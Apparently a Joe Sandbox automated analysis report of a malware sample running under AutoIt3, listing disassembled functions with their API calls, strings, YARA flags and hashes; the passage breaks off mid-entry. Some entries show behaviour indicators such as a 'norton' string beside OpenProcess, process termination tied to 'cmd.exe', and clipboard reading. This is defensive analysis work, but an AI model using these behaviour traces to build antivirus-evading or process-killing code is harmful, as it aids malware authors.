Instruction ID: 0f71fea950481d4caae32c9b9d65667e8afc2613a7c43aef9ba15fd2c1fae41d
Opcode Fuzzy Hash: eca8cc23e5ed04bef5c0c08c5dca539417199574e5e17a9f72b135181dae5084
Instruction Fuzzy Hash: D6311C75748305AFE314EF28CC81F1AB3E5EF88614F51896CFA989B391D670F8058B66

Function 04728BE4 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 04728C32
GetSystemMetrics.USER32(0000000C), ref: 04728C3E
GetDC.USER32(00000000), ref: 04728C5A
GetDeviceCaps.GDI32(00000000,0000000E), ref: 04728C81
GetDeviceCaps.GDI32(00000000,0000000C), ref: 04728C8E
ReleaseDC.USER32(00000000,00000000), ref: 04728CC7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 490ed469961ea681b300e51a13e2b0d303964047843fe1688e9695c6b3ab2942
Instruction ID: 1f55d6aa7393cf3d880d95ee4f868269f0aaffb9aad80ffccc12a81b73c97f46
Opcode Fuzzy Hash: 490ed469961ea681b300e51a13e2b0d303964047843fe1688e9695c6b3ab2942
Instruction Fuzzy Hash: B0317F70A00218EFEB00EFA4C980AAEBBB5FB49710F0186A9E514AB340D731B945CF65

Function 0470A888 Relevance: 9.1, APIs: 6, Instructions: 73synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0470A892
CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0470A8B7
RtlEnterCriticalSection.NTDLL(047528C4), ref: 0470A8D2
RtlLeaveCriticalSection.NTDLL(047528C4), ref: 0470A937
WaitForSingleObject.KERNEL32(?,000000FF,00000000,0470A96D,?,047528C4,00000000,0470A98C,?,047528C4,00000000,0470A9AA,?,00000000,000000FF,00000000), ref: 0470A950
RtlEnterCriticalSection.NTDLL(047528C4), ref: 0470A967

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
String ID:
API String ID: 1504017990-0
Opcode ID: 08a0d0ce42bba9992f1275c3bf6e39edf74afb7530e6e83e1bcf137b890fab6d
Instruction ID: 2b7ee68b7b2cce42b4797f73662ce8fcd06f5f6c4a64ba2483f07212078cb595
Opcode Fuzzy Hash: 08a0d0ce42bba9992f1275c3bf6e39edf74afb7530e6e83e1bcf137b890fab6d
Instruction Fuzzy Hash: 3521DC70B00700EFD711EFA4CC41AA9B7B8EB49718F918195E910AB7E0EB74BC10CE60

Function 01799031 Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(017A2B4D), ref: 01799060
LocalFree.KERNEL32(017AF098,00000000,01799125), ref: 01799072
VirtualFree.KERNEL32(?,00000000,00008000,017AF098,00000000,01799125), ref: 01799096
LocalFree.KERNEL32(00000000,?,00000000,00008000,017AF098,00000000,01799125), ref: 017990E7
RtlLeaveCriticalSection.NTDLL(017A2B4D), ref: 01799115
RtlDeleteCriticalSection.NTDLL(017A2B4D), ref: 0179911F

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 636cc0b749daf323ba77d99de89d7c2290649d24e1f8c92fa81ebdc2038bde92
Instruction ID: d7c509434c1bc8cd954238d867aba4e101a37dcf97f32133cc1c292f1aac7688
Opcode Fuzzy Hash: 636cc0b749daf323ba77d99de89d7c2290649d24e1f8c92fa81ebdc2038bde92
Instruction Fuzzy Hash: EA219074A04309EFEF21EFACF499B5DFBE0E74A324F904499E10097256E6309958DB16

Function 046F1C40 Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(047525CC), ref: 046F1C6F
LocalFree.KERNEL32(017B06E8,00000000,046F1D34), ref: 046F1C81
VirtualFree.KERNEL32(?,00000000,00008000,017B06E8,00000000,046F1D34), ref: 046F1CA5
LocalFree.KERNEL32(00000000,?,00000000,00008000,017B06E8,00000000,046F1D34), ref: 046F1CF6
RtlLeaveCriticalSection.NTDLL(047525CC), ref: 046F1D24
RtlDeleteCriticalSection.NTDLL(047525CC), ref: 046F1D2E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a0712ddefe1576d096c4c185ce5a78aaad4f97a9cb65569e57acc0867621cee1
Instruction ID: 5783ad5d4c8d0ea3edcd491bbe24834dda645649ee55c20d5871453447a52b93
Opcode Fuzzy Hash: a0712ddefe1576d096c4c185ce5a78aaad4f97a9cb65569e57acc0867621cee1
Instruction Fuzzy Hash: 622151B1501344EFE715EBA8DD55BC877E8E70A244F5044DAE680AB791F6B8BD40CF14

Function 04729068 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04728F20: GetObjectA.GDI32(?,00000054), ref: 04728F34

CreateCompatibleDC.GDI32(00000000), ref: 0472908A
SelectPalette.GDI32(?,?,00000000), ref: 047290AB
RealizePalette.GDI32(?), ref: 047290B7
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 047290CE
SelectPalette.GDI32(?,00000000,00000000), ref: 047290F6
DeleteDC.GDI32(?), ref: 047290FF

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: f2f685621e4ef31c71c762e372116b83f808c6d4535fdd3a9601260e85654f61
Instruction ID: 2fbb10cd5a6a2f2fde8c67d6fcf1e4e3e07f6937369e00c9fb548ea9ca5a8efd
Opcode Fuzzy Hash: f2f685621e4ef31c71c762e372116b83f808c6d4535fdd3a9601260e85654f61
Instruction Fuzzy Hash: 121194B5B002047FEB10DBA9CC95F5FB7FCEF48700F114454BA54E7240E674A9018B64

Function 0472888C Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 047288A5
SelectObject.GDI32(00000000,00000000), ref: 047288AE
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0472C3AF,?,?,?,?,0472AF1B), ref: 047288C2
SelectObject.GDI32(00000000,00000000), ref: 047288CE
DeleteDC.GDI32(00000000), ref: 047288D4
CreatePalette.GDI32 ref: 0472891A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 3990c346b5572951f18f8f721544f0437cd12e36d04ce9cef2cbc1842d10046c
Instruction ID: bbc89a84b83d6f016372f9a5f20a6fa114fd775c6d0bb5f6d38f971909240c70
Opcode Fuzzy Hash: 3990c346b5572951f18f8f721544f0437cd12e36d04ce9cef2cbc1842d10046c
Instruction Fuzzy Hash: 2B0196A121432066F610B769CD46B5B72A8DFC0758F05C91DB6C497280F676A8058357

Function 00C9C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C9C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C9C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C9C366
ReleaseDC.USER32(00000000,00000000), ref: 00C9C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C9C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00C9C397

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fef8aa456d6cbb9c2a3ec9262953e92c9d1a45d698f411b05e6e696a754581bb
Instruction ID: 6e41975748427a40589f8433bee2deb66e6589fd67e1b8433e3df1ac6a07ee2d
Opcode Fuzzy Hash: fef8aa456d6cbb9c2a3ec9262953e92c9d1a45d698f411b05e6e696a754581bb
Instruction Fuzzy Hash: 76014475E01218BBEF109BA99C49B9EBFB8EB48751F104066FE04A7290D6709D11CFA0

Function 00CCC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00C416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C41729
Part of subcall function 00C416CF: SelectObject.GDI32(?,00000000), ref: 00C41738
Part of subcall function 00C416CF: BeginPath.GDI32(?), ref: 00C4174F
Part of subcall function 00C416CF: SelectObject.GDI32(?,00000000), ref: 00C41778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CCC57C
LineTo.GDI32(00000000,00000003,?), ref: 00CCC590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC59E
LineTo.GDI32(00000000,00000000,?), ref: 00CCC5AE
EndPath.GDI32(00000000), ref: 00CCC5BE
StrokePath.GDI32(00000000), ref: 00CCC5CE

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 0118a3ae78b04b92348423f2acca3e1c102eded861e123c81a194d1ce79f4ffa
Instruction ID: fbb954ea03c6e80d215617983b609e53597073352edc1a7669a6904cc7b9be99
Opcode Fuzzy Hash: 0118a3ae78b04b92348423f2acca3e1c102eded861e123c81a194d1ce79f4ffa
Instruction Fuzzy Hash: 2911097240010DBFDB029F94DC88FAE7FADEB08354F148056FA589A160D771AE55EBA0

Function 0470C9B0 Relevance: 9.0, APIs: 6, Instructions: 44clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0470C9BA
GetClipboardData.USER32(00000001), ref: 0470C9C5
GlobalLock.KERNEL32(00000000), ref: 0470C9D1
GlobalSize.KERNEL32(00000000), ref: 0470C9E0
GlobalUnlock.KERNEL32(00000000), ref: 0470CA0B
CloseClipboard.USER32 ref: 0470CA10

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$CloseDataLockOpenSizeUnlock
String ID:
API String ID: 1964585863-0
Opcode ID: 878a0adc538742794cf6ea7bc97e7d5da374b17cb9e784dce4eaa8f2e0aadc29
Instruction ID: a8630f0dcf3ddcdb154f24f1dc819727118cd2f1cda00d46d9fc125b2d2c53fc
Opcode Fuzzy Hash: 878a0adc538742794cf6ea7bc97e7d5da374b17cb9e784dce4eaa8f2e0aadc29
Instruction Fuzzy Hash: 4FF096727065215BF326B678CC44B6F61C59F81798F05462DE6C0DB380EA64FC4282A9

Function 00C607BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C607EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C607F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C607FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C6080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C60812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C6081A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 91a155d16016daaef96690496389a718cb0ec61af636b1347927e9f4f50d1ccc
Instruction ID: 71120b1d38c502d2059f8f98cc94d51fe0d028a84e2f1486cd3a44110883866b
Opcode Fuzzy Hash: 91a155d16016daaef96690496389a718cb0ec61af636b1347927e9f4f50d1ccc
Instruction Fuzzy Hash: 61016CB09027597DE3008F5A8C85B56FFB8FF59354F00411BA15C47941C7F5A864CBE5

Function 04727F64 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 047279B0: CreateBrushIndirect.GDI32(?), ref: 04727A5A

UnrealizeObject.GDI32(00000000), ref: 04727F70
SelectObject.GDI32(00000000,00000000), ref: 04727F82
SetBkColor.GDI32(00000000,00000000), ref: 04727FA5
SetBkMode.GDI32(00000000,00000002), ref: 04727FB0
SetBkColor.GDI32(00000000,00000000), ref: 04727FCB
SetBkMode.GDI32(00000000,00000001), ref: 04727FD6

Part of subcall function 04726DEC: GetSysColor.USER32(?), ref: 04726DF6

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 426f709124fd5d0a932629c5e4915f4d438ea951d22d9305557e61a4707b4b61
Instruction ID: a1823a8551b2ca0e337db2d8f290c6b56b11b13a860bf6747b6c6f9f0dc7b55c
Opcode Fuzzy Hash: 426f709124fd5d0a932629c5e4915f4d438ea951d22d9305557e61a4707b4b61
Instruction Fuzzy Hash: 2FF09CF56412119BEF08FFB8DFC9E1B67ACAF042097044494BA88DF256EA65F8114735

Function 0179C3E6 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0179A631: GetKeyboardType.USER32(00000000), ref: 0179A636
Part of subcall function 0179A631: GetKeyboardType.USER32(00000001), ref: 0179A642

GetCommandLineA.KERNEL32 ref: 0179C44C
GetVersion.KERNEL32 ref: 0179C460
GetVersion.KERNEL32 ref: 0179C471
GetCurrentThreadId.KERNEL32 ref: 0179C4AD

Part of subcall function 0179A661: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A683
Part of subcall function 0179A661: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0179A6D2,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A6B6
Part of subcall function 0179A661: RegCloseKey.ADVAPI32(?,0179A6D9,00000000,?,00000004,00000000,0179A6D2,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A6CC

GetThreadLocale.KERNEL32 ref: 0179C48D

Part of subcall function 0179C31D: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0179C383), ref: 0179C343

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: 26b46289b05b6c6ad4d3f61120a7cf6d5e89da46880f74ccb06fa175430b9fcf
Instruction ID: 75722fd780ee4238fc62e14f3f842d3f41f39bb5eda7de62355f10609f893a4e
Opcode Fuzzy Hash: 26b46289b05b6c6ad4d3f61120a7cf6d5e89da46880f74ccb06fa175430b9fcf
Instruction Fuzzy Hash: 440108648493468AFF31FF74B41D318BE60BBA2324F948499C4954B26FEA39411C8B67

Function 046F6539 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 046F3468: GetKeyboardType.USER32(00000000), ref: 046F346D
Part of subcall function 046F3468: GetKeyboardType.USER32(00000001), ref: 046F3479

GetCommandLineA.KERNEL32 ref: 046F659F
GetVersion.KERNEL32 ref: 046F65B3
GetVersion.KERNEL32 ref: 046F65C4
GetCurrentThreadId.KERNEL32 ref: 046F6600

Part of subcall function 046F3498: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F34BA
Part of subcall function 046F3498: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,046F3509,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F34ED
Part of subcall function 046F3498: RegCloseKey.ADVAPI32(?,046F3510,00000000,?,00000004,00000000,046F3509,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F3503

GetThreadLocale.KERNEL32 ref: 046F65E0

Part of subcall function 046F6470: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,046F64D6), ref: 046F6496

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: 2842029fc9ab6a8a0801a9044ad9a10ae84f1b2c88087375bc76d2e6a5958408
Instruction ID: 3305067cf4ef128d1916829fd32ca5ae7a23c6bab7071af75fa760abcc7527e6
Opcode Fuzzy Hash: 2842029fc9ab6a8a0801a9044ad9a10ae84f1b2c88087375bc76d2e6a5958408
Instruction Fuzzy Hash: 9F01A8A5906341D9F711BFE8AD042D93B64EB22248F00889DC6C4DE266F7BC6D45CF6A

Function 0471DFB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0471E06F
GetCurrentProcessId.KERNEL32(001F0FFF,00000000,?), ref: 0471E09C
CloseHandle.KERNEL32(?), ref: 0471E177

Strings

IsWow64Process, xrefs: 0471E01A
norton, xrefs: 0471E109

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID: IsWow64Process$norton
API String ID: 2750122171-2964445548
Opcode ID: 679e5f634517c0a7125ad961463d6692f81564d6025f6318e9f9d570558153e7
Instruction ID: 96ec70d52dd7a6c860a725e8238c95b1d44100d6a27edae97676638c7e48112f
Opcode Fuzzy Hash: 679e5f634517c0a7125ad961463d6692f81564d6025f6318e9f9d570558153e7
Instruction Fuzzy Hash: 30511D70A006599FDB20EF68CC88B9EB7F5EF45304F1084A9D948A7360EA70AE85CF55

Function 0472CEE8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472CFA5
CreateHalftonePalette.GDI32(00000000,00000000), ref: 0472CFB2
ReleaseDC.USER32(00000000,00000000), ref: 0472CFC1
DeleteObject.GDI32(00000000), ref: 0472D02F

Strings

(, xrefs: 0472CF5B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateDeleteHalftoneObjectPaletteRelease
String ID: (
API String ID: 577518360-3887548279
Opcode ID: 92b8a337cb81dbc9ff47c032cb0ddd361774cd0eec3a0158cded795e03a427f8
Instruction ID: ab940d783f326cb2fe01f95af49c0298bc3cb01669fbde37811aab69db6776a5
Opcode Fuzzy Hash: 92b8a337cb81dbc9ff47c032cb0ddd361774cd0eec3a0158cded795e03a427f8
Instruction Fuzzy Hash: ED41D371A04258DFDB20DFA8C948B9DB7F6FF49304F0040A9E404A7360E674BE45DB40

Function 04749318 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A,00000001,00000000,00000000,04749454), ref: 047493CC
OpenProcess.KERNEL32(00000001,00000000,00000000,00000000), ref: 04749426
TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 0474942C

Strings

cmd.exe , xrefs: 04749373
SysListView32, xrefs: 047493E3

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$OpenSleepTerminate
String ID: SysListView32$cmd.exe
API String ID: 3651790450-1829564397
Opcode ID: 5f016de645a608236f99abf850a377ff9f1956d0feb1c333a118ad0b98de43f3
Instruction ID: 4aebdc8b6efd69fd3b20508be5eeb252bbc712d6b13c0b1d0681b2d58eb09825
Opcode Fuzzy Hash: 5f016de645a608236f99abf850a377ff9f1956d0feb1c333a118ad0b98de43f3
Instruction Fuzzy Hash: FE3153B0B00218ABE710EFB9CC80BAF73A4EF85714F908479AA549B350EB74FD018B44

Function 00CC6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C4214F
Part of subcall function 00C42111: GetStockObject.GDI32(00000011), ref: 00C42163
Part of subcall function 00C42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C4216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC6A86
LoadLibraryW.KERNEL32(?), ref: 00CC6A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC6AA2
DestroyWindow.USER32(?), ref: 00CC6AAA

Strings

SysAnimate32, xrefs: 00CC6A61

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 101a456411eed81558b03b804e5f4fa264a88178dd1ad89f6d4b5dda302a0beb
Instruction ID: 9fe87479b5592e131211c3a0a1ae507c1aff3d4a62a46caaba77eeb3c0a24298
Opcode Fuzzy Hash: 101a456411eed81558b03b804e5f4fa264a88178dd1ad89f6d4b5dda302a0beb
Instruction Fuzzy Hash: 2C215871200209AFEF108EB4DD81FBB77ADEB99364F20862DFA61A6190D371DC51A764

Function 0179A661 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A683
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0179A6D2,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A6B6
RegCloseKey.ADVAPI32(?,0179A6D9,00000000,?,00000004,00000000,0179A6D2,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0179A6CC

Strings

FPUMaskValue, xrefs: 0179A6AD
SOFTWARE\Borland\Delphi\RTL, xrefs: 0179A679

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: b51e49d27404b5d047c34b9eef684ebae1959c8219d6c64ab591b2ed365e69ae
Instruction ID: 0c5441e2f9193ef5274f6f3a6d2807987d86cdea526bcbde4cad0cd075097833
Opcode Fuzzy Hash: b51e49d27404b5d047c34b9eef684ebae1959c8219d6c64ab591b2ed365e69ae
Instruction Fuzzy Hash: 6401247A94430DBEEF21DFA0EC46FA9B3BCDB45B10F504065B900DB684E6B06924D798

Function 046F3498 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F34BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,046F3509,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F34ED
RegCloseKey.ADVAPI32(?,046F3510,00000000,?,00000004,00000000,046F3509,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 046F3503

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 046F34B0
FPUMaskValue, xrefs: 046F34E4

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: f421d91335d47e3ece2ccf1d4c16b6999bd0199357adc65167aebfef633265ce
Instruction ID: 9f4abb2f0f340fce016e4075f72254d9ebdd8d61124738ad00e60f25d89d5358
Opcode Fuzzy Hash: f421d91335d47e3ece2ccf1d4c16b6999bd0199357adc65167aebfef633265ce
Instruction Fuzzy Hash: A6019279900308BAE711DBD4CD02BFA77A8DB89B00F100466BB40D3680F674BE50CA58

Function 00CA22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CA2318

Strings

